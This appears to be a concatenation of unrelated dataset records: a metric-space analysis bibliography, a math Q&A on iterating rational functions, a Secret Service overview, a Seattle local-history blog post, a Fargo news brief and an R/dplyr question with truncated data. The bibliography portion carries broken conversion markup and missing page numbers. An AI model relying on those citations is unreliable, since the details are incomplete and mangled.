Quasicontinuity of Newton–Sobolev functions and density of Lipschitz functions on metric spaces, to appear in *Houston J. Math.*

Björn, A. and Marola, N., Moser iteration for (quasi)minimizers on metric spaces, *Manuscripta Math.* **121** (2006).

Björn, J., Boundary continuity for quasiminimizers on metric spaces, *Illinois J. Math.* **46** (2002).

Björn, J., MacManus, P. and Shanmugalingam, N., Fat sets and pointwise boundary estimates for [[$p\mspace{1mu}$]{}]{}-harmonic functions in metric spaces, *J. Anal. Math.* **85** (2001).

Buser, P., A note on the isoperimetric constant, *Ann. Sci. École Norm. Sup.* **15** (1982).

Capogna, L., Danielli, D. and Garofalo, N., Capacitary estimates and the local behavior of solutions of nonlinear subelliptic equations, *Amer. J. Math.* **118** (1996).

Carathéodory, C., Untersuchungen über die Grundlagen der Thermodynamik, *Math. Ann.* **67** (1909).

Chavel, I., *Eigenvalues in Riemannian Geometry*, Pure and Applied Mathematics, vol. 115, Academic Press, Orlando, 1984.

Cheeger, J., Differentiability of Lipschitz functions on metric measure spaces, *Geom. Funct. Anal.* **9** (1999).

Chow, W.L., Über Systeme von linearen partiellen Differentialgleichungen erster Ordnung, *Math. Ann.* **117** (1939).

David, G. and Semmes, S., *Fractured fractals and broken dreams. Self-similar geometry through metric and measure*, Oxford Lecture Series in Mathematics and its Applications, 7, The Clarendon Press, Oxford University Press, New York, 1997.

Sharp capacitary estimates for rings in metric spaces, to appear in *Houston J. Math.*

Garofalo, N. and Nhieu, D.-M., Isoperimetric and Sobolev inequalities for Carnot-Carathéodory spaces and the existence of minimal surfaces, *Comm. Pure Appl. Math.* **49** (1996).

Hajłasz, P. and Koskela, P., Sobolev met Poincaré, *Mem. Amer. Math. Soc.* **145** (2000).

Heinonen, J., *Lectures on Analysis on Metric Spaces*, Springer-Verlag, New York, 2001.

Heinonen, J., Kilpeläinen, T. and Martio, O., *Nonlinear Potential Theory of Degenerate Elliptic Equations*, Oxford University Press, Oxford, 1993.

Heinonen, J. and Koskela, P., Quasiconformal maps in metric spaces with controlled geometry, *Acta Math.* **181** (1998).

Holopainen, I., Nonlinear potential theory and quasiregular mappings on Riemannian manifolds, *Ann. Acad. 
Sci. Fenn. Ser. A I Math. Diss. **74 (1990), .***]{}]{} [[Holopainen, I. [[and ]{}]{}Shanmugalingam, N., Singular functions on metric measure spaces, *Collect. Math. **53 (2002), .***]{}]{} [[Jerison, D., The Poincaré inequality for vector fields satisfying Hörmander’s condition, *Duke Math. J. **53 (1986), .***]{}]{} [[Kallunki, S. [[and ]{}]{}Shanmugalingam, N., Modulus and continuous capacity, *Ann. Acad. Sci. Fenn. Math. **26 (2001), .***]{}]{} [[Keith, S., A differentiable structure for metric measure spaces, *Adv. Math. **183 (2004), .***]{}]{} [[Kilpeläinen, T., Kinnunen, J. [[and ]{}]{}Martio, O., Sobolev spaces with zero boundary values on metric spaces, *Potential Anal. **12 (2000), .***]{}]{} [[Kinnunen, J. [[and ]{}]{}Martio, O., The Sobolev capacity on metric spaces, *Ann. Acad. Sci. Fenn. Math. **21 (1996), .***]{}]{} , [Choquet property for the Sobolev capacity in metric spaces]{}, in [*Proceedings on Analysis and Geometry*]{} (Novosibirsk, Akademgorodok, 1999), pp. 285–290, Sobolev Institute Press, Novosibirsk, 2000. [[Kinnunen, J. [[and ]{}]{}Shanmugalingam, N., Regularity of quasi-minimizers on metric spaces, *Manuscripta Math. **105 (2001), .***]{}]{} [[Littman, W., Stampacchia, G. [[and ]{}]{}Weinberger, H.F., Regular points for elliptic equations with discontinuous coefficients, *Ann. Scuola Norm. Sup. Pisa (3) **18 (1963), .***]{}]{} [[Nagel, A., Stein, E.M. [[and ]{}]{}Wainger, S., Balls and metrics defined by vector fields I: basic properties, *Acta Math. **155 (1985), .***]{}]{} [[Rashevsky, P.K., Any two points of a totally nonholonomic space may be connected by an admissible line, *Uch. Zap. Ped. Inst. im. Liebknechta, Ser. Phys. Math., (Russian) **2 (1938), .***]{}]{} [[Rothschild, L.P. [[and ]{}]{}Stein, E.M., Hypoelliptic differential operators and nilpotent groups, *Acta Math. **137 (1976), .***]{}]{} , [Metric spaces and mappings seen at many scales]{} (Appendix B in [Gromov, M.,]{} *Metric Structures for Riemannian and Non-Riemannian Spaces*), [Ed. Progress in Mathematics, Birkhäuser, Boston, 1999.]{} [[Serrin, J., Local behavior of solutions of quasilinear equations, *Acta Math. **111 (1964), .***]{}]{} [[Serrin, J., Isolated singularities of solutions of quasilinear equations, *Acta Math. **113 (1965), .***]{}]{} [[Shanmugalingam, N., Newtonian spaces An extension of Sobolev spaces to metric measure spaces, *Rev. Mat. Iberoamericana **16 (2000), .***]{}]{} [[Shanmugalingam, N., Harmonic functions on metric spaces, *Illinois J. Math. **45 (2001), .***]{}]{} [^1]: Second author supported in part by NSF Grant DMS-0701001 [^2]: Third author supported by the Academy of Finland and Emil Aaltosen säätiö
null
minipile
NaturalLanguage
mit
null
Q: When does the sequence of iterates of a rational function converge? Darsh asks at the 20-questions seminar: Let $f:P^1 \rightarrow P^1$ be a rational function. Can you say when the sequence $\{ f^n(x)\}_n=\{ x,f(x),f(f(x)),\cdots\}$ converges? What about the sequence of averages $\left\{ \frac{1}{n+1}\sum_{i=0}^n f^i (x)\right\}_n$? Anything else?

A: I haven't really studied complex dynamics much, but here's a suggestion for the general case: In the Fatou set of f, you should use Sullivan's classification of Fatou components to help figure out the behavior of your sequence of averages. On the Julia set, the behavior of the sequence of averages is going to be some kind of a weighted average of f, but as the orbit of a generic point in J is dense in J, would the sequence of averages of such a point converge to something like a center of mass?

A: If a trajectory $f^n(x)$ converges, the limit must be a fixed point, that is, it satisfies $f(a)=a$. The number of fixed points is finite, and they can all be found by solving an algebraic equation. Now the question is, for given $x$ and $a$, to decide whether $f^n(x)\to a$. This can happen in two ways: a) $f^n(x)=a$ for some $n$, so the sequence becomes constant from some place, and trivially converges, or b) $f^n(x)\to a$ but $f^n(x)\neq a$ for all $n$. Whether a) happens for a given $x$ might be difficult to decide. The set of all $x$ for which $f^n(x)=a$ for some $n$ is usually dense on the Julia set, and the Julia set is quite complicated. One can show that it is not semi-algebraic in most cases, with a few trivial exceptions when it is a circle or an arc of a circle. Of course one can give various meanings to the words "given $x$" and "to find out". The question can be easier if, for example, $x$ is rational, and the coefficients of $f$ are rational. Or algebraic. Otherwise it is not clear in what form $x$ can be "given", etc. In case b), there is a reasonable description of the sets of convergence. The fixed points are divided into several categories according to the multiplier $\lambda=f'(a)$. For convergence b) to happen, this multiplier has to satisfy $|\lambda|<1$, or $\lambda^n=1$. This is a very deep result of R. Perez Marco. In these two cases, convergence b) happens in the so-called "domains of attraction", which are open but not necessarily connected. The boundary of such a domain of attraction coincides with the Julia set, so the "domains" can be quite complicated. But one can obtain very good pictures of them with a computer.

A: Consider a Mobius transformation f := z -> (az+b)/(cz+d) which rotates the Riemann sphere by an angle theta, where theta/Pi is not rational. Then the sequence of iterates of f is not periodic. But iterating f gives values which are uniformly distributed and dense on a certain circle on the Riemann sphere. Change coordinates back to the plane and I suspect the sequence of averages converges to the mean value on that circle. I haven't actually done the computation, though.
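A quick numerical sketch of the rotation case from the last answer (the specific map, angle, and starting point below are my own illustrative choices, not taken from the answer): for the normalized rotation $f(z)=e^{i\theta}z$ with $\theta/\pi$ irrational, the orbit stays on the circle $|z|=|z_0|$ while the running averages collapse toward that circle's center.

import cmath

# Illustrative elliptic Mobius map, normalized to a pure rotation about 0 and infinity:
# f(z) = e^{i*theta} * z, with theta/pi irrational so the orbit never closes up.
theta = 2.0
rot = cmath.exp(1j * theta)

z0 = 1.5 + 0.5j          # arbitrary starting point
z = z0
total = 0j
checkpoints = {10, 100, 1_000, 10_000, 100_000}

for n in range(1, 100_001):
    total += z           # running sum of f^0(z0), ..., f^{n-1}(z0)
    if n in checkpoints:
        avg = total / n
        print(f"n={n:6d}  |orbit point|={abs(z):.4f}  |average|={abs(avg):.6f}")
    z = rot * z

# |orbit point| stays at |z0| (about 1.5811) while |average| shrinks toward 0,
# the center of the orbit circle, consistent with the heuristic above.

For a general elliptic Mobius map one can conjugate it to this normal form; as long as the image circle avoids the pole, the averages should tend to the mean value over that circle with respect to the pushed-forward uniform measure, which is the "mean value on that circle" suggested in the answer.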
null
minipile
NaturalLanguage
mit
null
Treasury roles, covering missions such as prevention and investigation of counterfeiting of U.S. currency and U.S. Treasury bonds and notes, and investigation of major fraud. Protective roles, ensuring the safety of current and former national leaders and their families, such as the President, past Presidents, Vice Presidents, presidential candidates, foreign embassies (per an agreement with the US State Department's Bureau of Diplomatic Security (DS) Office of Foreign Missions (OFM)), etc.

The Secret Service's initial responsibility was to investigate crimes related to the Treasury; it then evolved into the United States' first domestic intelligence and counterintelligence agency. Many of the agency's missions were later taken over by subsequent agencies such as the FBI, ATF, and IRS.

The agency combines the resources of academia; the private sector; and federal, state, and local law enforcement agencies to combat computer-based threats to the U.S. financial payment systems and critical infrastructures. In addition, these combined resources allow the ECTF to identify and address potential cyber vulnerabilities before the criminal element exploits them. This proactive approach has successfully prevented cyber attacks that otherwise would have resulted in large-scale financial losses for the American public and U.S.-based companies or disruption of critical infrastructures.

Since online child pornography crime is not a core violation for the agency, it has pursued fewer investigations involving this crime than other crimes, such as counterfeiting. However, some USSS field offices with a background in these areas as well as digital forensic capabilities investigate these crimes.
null
minipile
NaturalLanguage
mit
null
Seattle Now & Then: A Moveable Fiesta THEN: Sitting on a small triangle at the odd northwest corner of Third Avenue and the Second Ave. S. Extension, the Fiesta Coffee Shop was photographed and captioned, along with all taxable structures in King County, by Works Progress Administration photographers during the lingering Great Depression of the late 1930s. (Courtesy, Washington State Archive’s Puget Sound Branch)NOW: Jean Sherrard has followed the landmark adobe hut’s move of 1938 across the Second Ave. Extension. With this week’s “Now and Then” Jean and I have conspired, perhaps, to confuse you, although not for long. On first glimpse it is evident that in the 76 years that separate our “then” from our “now,” their shared subject, an adobe hut at the corner of Main Street and the Second Ave. S. Extension, has endured. However, on second glimpse, it is also certain that the hut’s milieu has pivoted. We explain. Before the Second Ave. Extension, looking south from the Smith Tower on March 14, 1928. (Courtesy Municipal Archive)Fourteen months later, June 11, 1929. (Courtesy, Seattle Municipal Archive) In 1928 the long, wide, and straight path of Seattle’s Second Avenue, between Stewart Street and Yesler Way, was cut through to Jackson Street as the Second Ave. S. Extension. Thereby, it was explained, “Seattle’s Market Street” (a little used nickname) might make a grand beeline to the railroad stations on the south side of Jackson. Of the fifteen buildings sliced into along the new route, three were entirely destroyed, including a fire station with tower that sat at the northwest corner of Main Street and Third Avenue. (Station No. 10’s own feature is attached below.) The Extension ran right through that station’s former location, except for its northeast and southwest corners, which became small triangular lots on either side of the Extension. (Here you may wish to find a map. There’s a good one on the blog listed at the bottom. We’ll make it easier and put both a detail below from the 1912 Baist Map and another from the sky: a detail of the corner and more in Seattle’s city-wide 1936 aerial.) Someone has drawn borders for the 1928 Second Ave. Extension through this detail from the 1912 Baist Real Estate Map. Yesler Way runs along the top, and Jackson Street the bottom. Note, near the center, the Fire Department Headquarters, aka Fire Station No. 10. here at the northwest corner of Third Ave. South and Main Street. (Courtesy, Ron Edge)A detail from the 1936 aerial map-survey of Seattle. Yesler Way is at the top, Jackson St. at the bottom, and the Second Avenue Extension clearly cuts between them. The two triangles – east and west – are found just below the middle of the subject. (Courtesy, Seattle Municipal Archive)The Fiesta’s original location. Third Avenue is on the right, and Main Street behind Jean.. In our “then,” the Fiesta Coffee Shop stands on the triangle on the east side of Second. The buildings behind it are on Third Avenue. In our “now,” however, the adobe hut survives on the Extension’s west side as the Main Street Gyro, and the structures that surround it are mostly on Second Avenue and Main Street. To record his “repeat,” Jean stood just off the curb on Main. Another of the Foster and Kleiser billboard recordings, this one dated July 8, 1929, soon after the completion of the Second Ave. Extension. The scene looks west on Main Street and across the freshly paved Extension. 
As the company’s caption makes clear, this negative was exposed for the billboard on the east facade of the Hotel Main. It advertises Westerman’s Lee Oversalls.A tax photo from January 1, 1938, showing the Hotel Main and, on the right in the west triangle, appears to be a hut, connected, perhaps to Schneiderman’s gas station, when it was still on this the west side of the Second Ave. Extension. Sometime during the warmer months of 1938, the small café was moved across the Second Ave. S. Extension as Betty’s Coffee Shop, in a trade of triangles between Harry Schneiderman and Betty. The small service station Schneiderman had built on the west triangle, he rebuilt on the east side as a modern Signal station with four pumps and two bays for repairs. Under his name, which he signed below the station’s roofline, the one time center for the UW football team added, “I Ain’t Mad at Nobody.” Harry “I ain’t mad at nobody” Schneiderman’s Signal Station snuggled in the triangle on the east side of the Second Ave. Extension, on Oct. 4, 1938. That is 3rd Ave. S. on the right. (Courtesy, Washington State Archive, Bellevue Community College branch) With the help of Bob Masin, the hut’s owner since 1980, we have figured that since the small café’s 1938 move across the Extension, it has had six names with six cuisines. It began in 1938 as Betty’s Coffee Shop and continued so into the 1970s. Masin remembers sitting as a child with his father and grandfather at the small counter watching Betty, always in her apron, serve the policemen standing in the aisle drinking coffee. Following Betty’s came the Greek Villa, the Masada Café, the Penguin Café, the Main Street Teriyaki, and presently the Main Street Gyro. The “east triangle” with the Boston Baked Beans log cabin in 1937. Sometime soon after this tax photo was recorded the sides were flattened with plaster and the menu changed to Mexican. The Ace Hotel at 312-318 Second Ave., was one of the buildings sliced thru with the 1928-29 Second Ave. S. extension. (Courtesy, Washington State Archive, the branch on the Bellevue Community College campus. Returning now to the hut’s origins, the earliest tax photo (above) from 1937 shows it as a log cabin for the short-lived sale of New England Baked Beans and Brown Bread, and the tax card accompanying the photo has it built in 1934. And so we may confidently make note that without leaving the corner, the café’s earliest move was from Massachusetts to Mexico when the logs were covered with adobe and the roof with red tiles for the also short-lived Fiesta Coffee-Shop. WEB EXTRAS Additions galore this week, lads? Jean, Ron has put up a healthy seven links, and the first one looks north and directly through the new intersection of Third Ave. S., the Second Ave. Extension and Main Street. Look close and you will find the Fiesta in the “east triangle” before it was moved to the other (west) side of the Second Ave. Extension. [If this triangle business is not clear by now, I’m wringing my hands!] The links will be followed by three or four other features that are not so recent as The Seven Below, but still are either of the neighborhood or one of the this feature’s subjects that being fast food, and want of food fast. ====== A FIVE BALL CLUSTER at THIRD AVE. S. AND MAIN STREET, CA. 1911 (Courtesy, Seattle Municipal Archive) A corner of Fire House No. 10 shows across Main Street on the left. This appeared first in Pacific, October, 9, 1994. ====== FIREHOUSE NO. 
10 Both the Great Northern (with the tower) and Union Pacific Depots, are found here on the far side of Jackson Street in this ca. 1913 look down from the new Smith Tower. A second tower, appearing on the bottom-right, is part of Firehouse No. 10 at the northwest corner of Main Street and Third Ave. South. There is, of course, as yet no Second Ave. Extension. (Courtesy, Lawton Gowey)Firehouse No.10 – and its tower – under construction in 1903. Looking northwest to the northwest corner of Third Ave. and Main Street.
null
minipile
NaturalLanguage
mit
null
North Dakota woman charged with leaving 6 kids with dead man A North Dakota woman has been charged with felony child neglect after she was accused of leaving six children with the body of an acquaintance who overdosed FARGO, N.D. -- A North Dakota woman has been charged with felony child neglect after she was accused of leaving six children with the body of an acquaintance who overdosed. Amber Barrett of Fargo also is charged with a misdemeanor count of failing to report a death. Documents filed in Cass County District Court said police were called on Nov. 16 to a home on a report of an unresponsive man. Officers were let into the home by six minor children, ages unknown, who directed them to the man lying on the living room floor. Efforts to revive the man were unsuccessful. Police contacted Barrett, who was at work, and she returned home. Barrett told an officer that her friend was sweating heavily and slurring his words earlier and she believed he was likely overdosing. Police said, however, that Barrett knew the man was dead before she left for work. Court records do not list an attorney for Barrett who could speak on her behalf.
null
minipile
NaturalLanguage
mit
null
Q: How do I calculate percent difference between max and min values in consecutive rows by group? Request I was able to identify the minimum and maximum in_state_total values by the group. I would like to add another column that calculates the percent difference between the maximum value and the minimum value for each group. The result should occupy both rows for each group so I can further sort the data before plotting. I would prefer a dplyr approach, but am open to exploring other options in order to deepen my understanding of the issue and the potential solutions. Current Code tuition_cost_clean %>% filter(degree_length == "4 Year") %>% arrange(state, desc(in_state_total)) %>% group_by(state_abbr) %>% slice(which.max(in_state_total), which.min(in_state_total)) %>% select(name, state_abbr, in_state_total) Current Output name state_abbr in_state_total <chr> <chr> <dbl> Alaska Pacific University AK 28130 Alaska Bible College AK 15000 Spring Hill College AL 52926 Huntsville Bible College AL 5390 Hendrix College AR 58074 University of Arkansas for Medical Sciences AR 8197 Desired Output name state_abbr in_state_total pct_change <chr> <chr> <dbl> Alaska Pacific University AK 28130 46.6761% Alaska Bible College AK 15000 46.6761% Spring Hill College AL 52926 89.816% Huntsville Bible College AL 5390 89.816% Hendrix College AR 58074 85.8852% University of Arkansas for Medical Sciences AR 8197 85.8852% Data tuition_cost_clean <- structure(list(name = c("Aaniiih Nakoda College", "Abilene Christian University", "Abraham Baldwin Agricultural College", "Academy College", "Academy of Art University", "Adams State University", "Adelphi University", "Adirondack Community College", "Adrian College", "Advanced Technology Institute", "Adventist University of Health Sciences", "Agnes Scott College", "Aiken Technical College", "Aims Community College", "Alabama Agricultural and Mechanical University", "Alabama Southern Community College", "Alabama State University", "Alamance Community College", "Alaska Bible College", "Alaska Pacific University", "Albany College of Pharmacy and Health Sciences", "Albany State University", "Albany Technical College", "Albertus Magnus College", "Albion College", "Albright College", "Alcorn State University", "Alderson-Broaddus University", "Alexandria Technical and Community College", "Alfred University", "Allan Hancock College", "Allegany College of Maryland", "Allegheny College", "Allegheny Wesleyan College", "Allen College", "Allen County Community College", "Allen University", "Alliant International University", "Alma College", "Alpena Community College", "Alvernia University", "Alverno College", "Alvin Community College", "Amarillo College", "Amberton University", "American Academy McAllister Institute of Funeral Service", "American Academy of Art", "American Academy of Dramatic Arts", "American Academy of Dramatic Arts: West", "American Baptist College", "American Indian College of the Assemblies of God", "American International College", "American Jewish University", "American National University: Charlottesville", "American National University: Danville", "American National University: Harrisonburg", "American National University: Lynchburg", "American National University: Martinsville", "American National University: Salem", "American University SystemFor-profit", "American River College", "American Samoa Community College", "American University", "American University of Puerto Rico", "Amherst College", "Amridge University", "Ancilla College", "Anderson University", 
"Anderson University", "Andrew College", "Andrews University", "Angelina College", "Angelo State University", "Anna Maria College", "Anne Arundel Community College", "Anoka Technical College", "Anoka-Ramsey Community College", "Antelope Valley College", "Antioch College", "Antioch University Los Angeles", "Antioch University Midwest", "Antioch University Santa Barbara", "Antioch University Seattle", "Apex School of Theology", "Appalachian Bible College", "Appalachian State University", "Aquinas College", "Aquinas College", "Arapahoe Community College", "Arcadia University", "Arizona Christian University", "Arizona State University", "Arizona Western College", "Arkansas Baptist College", "Arkansas Northeastern College", "Arkansas State University", "Arkansas State University Mid-South", "Arkansas State University: Beebe", "Arkansas State University: Mountain Home", "Arkansas State University: Newport", "Arkansas Tech University", "Arlington Baptist University", "Armstrong State University", "Art Academy of Cincinnati", "Art Center College of Design", "Art Institute of Houston", "Art Institute of Philadelphia", "Art Institute of Phoenix", "Art Institute of Pittsburgh", "ASA College", "Asbury University", "Asheville-Buncombe Technical Community College", "Ashford University", "Ashland Community and Technical College", "Ashland University", "Ashworth College", "Asnuntuck Community College", "Assumption College", "Assumption College for Sisters", "Athens State University", "Athens Technical College", "Atlanta Metropolitan State College", "Atlanta Technical College", "Atlantic Cape Community College", "Atlantic University College", "Auburn University", "Auburn University at Montgomery", "Augsburg University", "Augusta Technical College", "Augusta University", "Augustana College", "Augustana University", "Aultman College of Nursing and Health Sciences", "Aurora University", "Austin College", "Austin Community College", "Austin Graduate School of Theology", "Austin Peay State University", "Ave Maria University", "Averett University", "Avila University", "Azusa Pacific University", "Babson College", "Baker University", "Bakersfield College", "Baldwin Wallace University", "Ball State University", "Baltimore City Community College", "Baptist Bible College", "Baptist College of Florida", "Baptist College of Health Sciences", "Baptist Missionary Association Theological Seminary", "Baptist University of the Americas", "Barclay College", "Bard College", "Bard College at Simon's Rock", "Barnard College", "Barry University", "Barstow Community College", "Barton College", "Barton County Community College", "Bastyr University", "Bates College", "Bates Technical College", "Baton Rouge Community College", "Bay College", "Bay Mills Community College", "Bay Path University", "Bay State College", "Bayamon Central University", "Baylor University", "Beacon College", "Beaufort County Community College", "Becker College", "Beckfield College", "Beis Medrash Heichal Dovid", "Belhaven University", "Bellarmine University", "Bellevue College", "Bellevue University", "Bellin College", "Bellingham Technical College", "Belmont Abbey College", "Belmont College", "Belmont University", "Beloit College", "Bemidji State University", "Benedict College", "Benedictine College", "Benedictine University", "Benjamin Franklin Institute of Technology", "Bennett College for Women", "Bennington College", "Bentley University", "Berea College", "Bergen Community College", "Bergin University of Canine Studies", "Berkeley City College", 
"Berklee College of Music", "Berkshire Community College" ), state = c("Montana", "Texas", "Georgia", "Minnesota", "California", "Colorado", "New York", "New York", "Michigan", "Virginia", "Florida", "Georgia", "South Carolina", "Colorado", "Alabama", "Alabama", "Alabama", "North Carolina", "Alaska", "Alaska", "New York", "Georgia", "Georgia", "Connecticut", "Michigan", "Pennsylvania", "Mississippi", "West Virginia", "Minnesota", "New York", "California", "Maryland", "Pennsylvania", "Ohio", "Iowa", "Kansas", "South Carolina", "California", "Michigan", "Michigan", "Pennsylvania", "Wisconsin", "Texas", "Texas", "Texas", "New York", "Illinois", "New York", "California", "Tennessee", "Arizona", "Massachusetts", "California", "Virginia", "Virginia", "Virginia", "Virginia", "Virginia", "Virginia", "West Virginia", "California", NA, NA, NA, "Massachusetts", "Alabama", "Indiana", "South Carolina", "Indiana", "Georgia", "Michigan", "Texas", "Texas", "Massachusetts", "Maryland", "Minnesota", "Minnesota", "California", "Ohio", "California", "Ohio", "California", "Washington", "North Carolina", "West Virginia", "North Carolina", "Michigan", "Tennessee", "Colorado", "Pennsylvania", "Arizona", "Arizona", "Arizona", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Arkansas", "Texas", "Georgia", "Ohio", "California", "Texas", "Pennsylvania", "Arizona", "Pennsylvania", "New York", "Kentucky", "North Carolina", "California", "Kentucky", "Ohio", "Georgia", "Connecticut", "Massachusetts", "New Jersey", "Alabama", "Georgia", "Georgia", "Georgia", "New Jersey", NA, "Alabama", "Alabama", "Minnesota", "Georgia", "Georgia", "Illinois", "South Dakota", "Ohio", "Illinois", "Texas", "Texas", "Texas", "Tennessee", "Florida", "Virginia", "Missouri", "California", "Massachusetts", "Kansas", "California", "Ohio", "Indiana", "Maryland", "Missouri", "Florida", "Tennessee", "Texas", "Texas", "Kansas", "New York", "Massachusetts", "New York", "Florida", "California", "North Carolina", "Kansas", "Washington", "Maine", "Washington", "Louisiana", "Michigan", "Michigan", "Massachusetts", "Massachusetts", NA, "Texas", "Florida", "North Carolina", "Massachusetts", "Kentucky", "New York", "Mississippi", "Kentucky", "Washington", "Nebraska", "Wisconsin", "Washington", "North Carolina", "Ohio", "Tennessee", "Wisconsin", "Minnesota", "South Carolina", "Kansas", "Illinois", "Massachusetts", "North Carolina", "Vermont", "Massachusetts", "Kentucky", "New Jersey", "California", "California", "Massachusetts", "Massachusetts"), state_code = c("MT", "TX", "GA", "MN", "CA", "CO", "NY", "NY", "MI", "VA", "FL", "GA", "SC", "CO", "AL", "AL", "AL", "NC", "AK", "AK", "NY", "GA", "GA", "CT", "MI", "PA", "MS", "WV", "MN", "NY", "CA", "MD", "PA", "OH", "IA", "KS", "SC", "CA", "MI", "MI", "PA", "WI", "TX", "TX", "TX", "NY", "IL", "NY", "CA", "TN", "AZ", "MA", "CA", "VA", "VA", "VA", "VA", "VA", "VA", "WV", "CA", "AS", "DC", "PR", "MA", "AL", "IN", "SC", "IN", "GA", "MI", "TX", "TX", "MA", "MD", "MN", "MN", "CA", "OH", "CA", "OH", "CA", "WA", "NC", "WV", "NC", "MI", "TN", "CO", "PA", "AZ", "AZ", "AZ", "AR", "AR", "AR", "AR", "AR", "AR", "AR", "AR", "TX", "GA", "OH", "CA", "TX", "PA", "AZ", "PA", "NY", "KY", "NC", "CA", "KY", "OH", "GA", "CT", "MA", "NJ", "AL", "GA", "GA", "GA", "NJ", "PR", "AL", "AL", "MN", "GA", "GA", "IL", "SD", "OH", "IL", "TX", "TX", "TX", "TN", "FL", "VA", "MO", "CA", "MA", "KS", "CA", "OH", "IN", "MD", "MO", "FL", "TN", "TX", "TX", "KS", "NY", "MA", "NY", "FL", "CA", "NC", "KS", "WA", "ME", 
"WA", "LA", "MI", "MI", "MA", "MA", "PR", "TX", "FL", "NC", "MA", "KY", "NY", "MS", "KY", "WA", "NE", "WI", "WA", "NC", "OH", "TN", "WI", "MN", "SC", "KS", "IL", "MA", "NC", "VT", "MA", "KY", "NJ", "CA", "CA", "MA", "MA"), type = c("Public", "Private", "Public", "For Profit", "For Profit", "Public", "Private", "Public", "Private", "For Profit", "Private", "Private", "Public", "Public", "Public", "Public", "Public", "Public", "Private", "Private", "Private", "Public", "Public", "Private", "Private", "Private", "Public", "Private", "Public", "Private", "Public", "Public", "Private", "Private", "Private", "Public", "Private", "Private", "Private", "Public", "Private", "Private", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "For Profit", "For Profit", "For Profit", "For Profit", "For Profit", "For Profit", "Public", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Public", "Private", "Public", "Public", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Private", "Public", "Private", "Private", "Public", "Public", "Private", "Public", "Public", "Public", "Public", "Public", "Public", "Public", "Private", "Public", "Private", "Private", "For Profit", "For Profit", "For Profit", "For Profit", "For Profit", "Private", "Public", "For Profit", "Public", "Private", "For Profit", "Public", "Private", "Private", "Public", "Public", "Public", "Public", "Public", "Private", "Public", "Public", "Private", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Public", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Public", "Private", "Private", "Public", "Public", "Public", "Public", "Private", "For Profit", "Private", "Private", "Private", "Public", "Private", "For Profit", "Private", "Private", "Private", "Public", "Private", "Private", "Public", "Private", "Public", "Private", "Private", "Public", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Private", "Public", "Private", "Public", "Private", "Public"), degree_length = c("2 Year", "4 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", 
"4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "2 Year", "2 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "4 Year", "4 Year", "4 Year", "2 Year", "4 Year", "2 Year", "4 Year", "2 Year"), room_and_board = c(NA, 10350, 8474, NA, 16648, 8782, 16030, 11660, 11318, NA, 4200, 12330, NA, NA, 8379, NA, 5422, NA, 5700, 7300, 10920, 8878, NA, 13200, 12380, 12070, 9608, 8860, NA, 12516, NA, NA, 12140, 4000, 7282, 5070, 7230, NA, 10998, NA, NA, 8546, NA, NA, NA, NA, NA, 17955, 13255, 8640, 6250, 14300, 17362, NA, NA, NA, NA, NA, NA, NA, NA, NA, 14880, NA, 14740, NA, 9600, 9830, 9890, 10636, 9078, 5500, 9130, 14630, NA, NA, NA, NA, 7640, NA, NA, NA, NA, NA, 7960, 8304, 9332, NA, NA, 13800, 10674, 12648, 6700, 8826, NA, 8160, NA, 5280, NA, NA, 7870, 6500, 11385, 6700, NA, 9600, NA, 10928, 2758, 9500, 7160, NA, NA, NA, 9941, NA, NA, 12694, NA, NA, NA, NA, NA, NA, NA, 13332, 6980, 10280, NA, 9640, 10572, 8248, NA, 11700, 12527, NA, NA, 10700, 11436, 9976, 7200, 10076, 16312, 8410, NA, 9554, 10234, NA, 7500, 4612, 2900, 3150, 2500, 9300, 15488, 14916, 17225, 11100, NA, 10120, 5794, 7590, 15224, NA, NA, 3200, NA, 12799, 